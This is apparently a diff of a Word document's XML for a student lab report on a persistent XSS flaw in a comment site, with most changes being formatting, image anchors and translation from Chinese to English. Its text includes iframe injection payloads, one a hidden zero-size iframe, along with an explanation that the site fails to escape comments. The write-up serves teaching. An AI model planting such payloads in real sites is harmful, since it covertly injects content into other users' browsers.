+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -1516,58 +1584,153 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">增加一留言，并在留言内容中改为 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>&lt;iframe src="http://www.hit.edu.cn"&gt;&lt;/iframe&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Thinking :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">When other user open this site , the scripts will run if his </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> allow </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="__DdeLink__104_1282748787"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The  scripts run , because the site don’t </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="1" w:name="Contextual_output_encoding.2Fescaping_of_string_input1"/>
+      <w:bookmarkEnd w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>escap</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> string </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>of the comments , so the browser run it  as  JavaScript.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:ind w:left="1260" w:hanging="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="19">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>154940</wp:posOffset>
+              <wp:posOffset>409575</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
+              <wp:posOffset>83185</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="4268470" cy="2400935"/>
+            <wp:extent cx="5097780" cy="2867025"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="7" name="Image6" descr=""/>
+            <wp:docPr id="7" name="Image17" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1575,7 +1738,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="7" name="Image6" descr=""/>
+                    <pic:cNvPr id="7" name="Image17" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -1589,7 +1752,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4268470" cy="2400935"/>
+                      <a:ext cx="5097780" cy="2867025"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1622,92 +1785,24 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>The simple apply of persistent XSS vulnerability</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1719,18 +1814,17 @@
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
         <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>测试返回效果</w:t>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Leave a comment and change the content to : &lt;iframe src="http://www.hit.edu.cn"&gt;&lt;/iframe&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1750,18 +1844,18 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="7">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>282575</wp:posOffset>
+              <wp:posOffset>154940</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>79375</wp:posOffset>
+              <wp:posOffset>635</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="3138170" cy="1765300"/>
+            <wp:extent cx="5027295" cy="2827655"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="8" name="Image7" descr=""/>
+            <wp:docPr id="8" name="Image6" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1769,7 +1863,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="8" name="Image7" descr=""/>
+                    <pic:cNvPr id="8" name="Image6" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -1783,7 +1877,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3138170" cy="1765300"/>
+                      <a:ext cx="5027295" cy="2827655"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1871,23 +1965,131 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
         <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>test the effect</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1907,18 +2109,18 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="10">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>401955</wp:posOffset>
+              <wp:posOffset>284480</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>204470</wp:posOffset>
+              <wp:posOffset>220345</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="3316605" cy="1865630"/>
+            <wp:extent cx="5076190" cy="2854960"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="9" name="Image8" descr=""/>
+            <wp:docPr id="9" name="Image7" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1926,7 +2128,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="9" name="Image8" descr=""/>
+                    <pic:cNvPr id="9" name="Image7" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -1940,7 +2142,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3316605" cy="1865630"/>
+                      <a:ext cx="5076190" cy="2854960"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2064,48 +2266,145 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:sz w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>change the comment to:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>&lt;iframe src=http://today.hit.edu.cn width="0" height="0"&gt;&lt;/iframe&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>358140</wp:posOffset>
+              <wp:posOffset>276860</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>160655</wp:posOffset>
+              <wp:posOffset>327025</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="2724150" cy="1532255"/>
+            <wp:extent cx="5128260" cy="2884805"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="10" name="Image9" descr=""/>
+            <wp:docPr id="10" name="Image8" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2113,7 +2412,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="10" name="Image9" descr=""/>
+                    <pic:cNvPr id="10" name="Image8" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -2127,7 +2426,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2724150" cy="1532255"/>
+                      <a:ext cx="5128260" cy="2884805"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2142,46 +2441,278 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:sz w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:sz w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:sz w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:sz w:val="21"/>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
